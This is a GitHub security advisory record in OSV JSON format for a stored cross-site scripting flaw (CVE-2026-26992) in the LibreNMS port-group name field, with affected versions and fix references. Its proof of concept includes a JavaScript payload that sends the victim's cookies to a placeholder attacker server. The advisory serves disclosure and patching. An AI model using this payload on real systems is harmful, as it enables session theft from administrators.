{"id":"GHSA-93fx-g747-695x","summary":"LibreNMS /port-groups name Stored Cross-Site Scripting","details":"### Summary\n**/port-groups name Stored Cross-Site Scripting**\n\n- HTTP POST\n- Request-URI(s): \"/port-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a port group, an HTTP POST request is sent to the Request-URI \"/port-groups\". The name of the newly created port group is stored in the value of the name parameter.\n- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.\n\n### Details\nThe vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/port-group/index.blade.php:_\n```\n@extends('layouts.librenmsv1')\n@section('title', __('Port Groups'))\n@section('content')\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-port-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($port_groups as $port_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __('delete Port Group') }}\" aria-label=\"{{ __('Delete') }}\"\n\nonclick=\"delete_pg(this, '{{ $port_group-\n\u003ename }}', '{{ route('port-groups.destroy', $port_group-\u003eid) }}')\"\u003e // using the\nport's name in the Delete button functionality without sanitizing for XSS related\ncharacters/strings\n```\n\nAs the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Ports \u003e Manage Port Groups\n- Select New Port Group\n- Input `12345');varpt=newImage();pt.src='http://\u003cATTACKER_IP\u003e/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)`\n- Select Save\n- Select the Delete Icon for the newly created Port Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.","aliases":["CVE-2026-26992"],"modified":"2026-02-20T17:04:19.641902Z","published":"2026-02-18T22:07:42Z","database_specific":{"cwe_ids":["CWE-79"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-02-18T22:07:42Z","nvd_published_at":"2026-02-20T03:16:00Z"},"references":[{"type":"WEB","url":"https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26992"},{"type":"WEB","url":"https://github.com/librenms/librenms/pull/19042"},{"type":"WEB","url":"https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f"},{"type":"PACKAGE","url":"https://github.com/librenms/librenms"},{"type":"WEB","url":"https://github.com/librenms/librenms/releases/tag/26.2.0"}],"affected":[{"package":{"name":"librenms/librenms","ecosystem":"Packagist","purl":"pkg:composer/librenms/librenms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"26.2.0"}]}],"versions":["1.19","1.20","1.20.1","1.21","1.22","1.22.01","1.23","1.24","1.25","1.26","1.27","1.28","1.29","1.30","1.30.01","1.31","1.31.01","1.31.02","1.31.03","1.32","1.32.01","1.33","1.33.01","1.34","1.35","1.36","1.36.01","1.37","1.38","1.39","1.40","1.41","1.42","1.42.01","1.43","1.44","1.45","1.46","1.47","1.48","1.48.1","1.49","1.50","1.50.1","1.51","1.52","1.53","1.53.1","1.54","1.55","1.56","1.57","1.58","1.58.1","1.59","1.60","1.61","1.62","1.62.1","1.62.2","1.63","1.64","1.64.1","1.65","1.65.1","1.66","1.67","1.68","1.69","1.70.0","1.70.1","21.1.0","21.10.0","21.10.1","21.10.2","21.11.0","21.12.0","21.12.1","21.2.0","21.3.0","21.4.0","21.5.0","21.5.1","21.6.0","21.7.0","21.8.0","21.9.0","21.9.1","22.1.0","22.10.0","22.11.0","22.12.0","22.2.0","22.2.1","22.2.2","22.3.0","22.4.0","22.4.1","22.5.0","22.6.0","22.7.0","22.8.0","22.9.0","23.1.0","23.1.1","23.10.0","23.11.0","23.2.0","23.4.0","23.4.1","23.5.0","23.6.0","23.7.0","23.8.0","23.8.1","23.8.2","23.9.0","23.9.1","24.1.0","24.10.0","24.10.1","24.11.0","24.12.0","24.2.0","24.3.0","24.4.0","24.4.1","24.5.0","24.6.0","24.7.0","24.8.0","24.8.1","24.9.0","24.9.1","25.1.0","25.10.0","25.11.0","25.12.0","25.2.0","25.3.0","25.4.0","25.5.0","25.6.0","25.7.0","25.8.0","25.9.0","25.9.1","26.1.0","26.1.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"}]}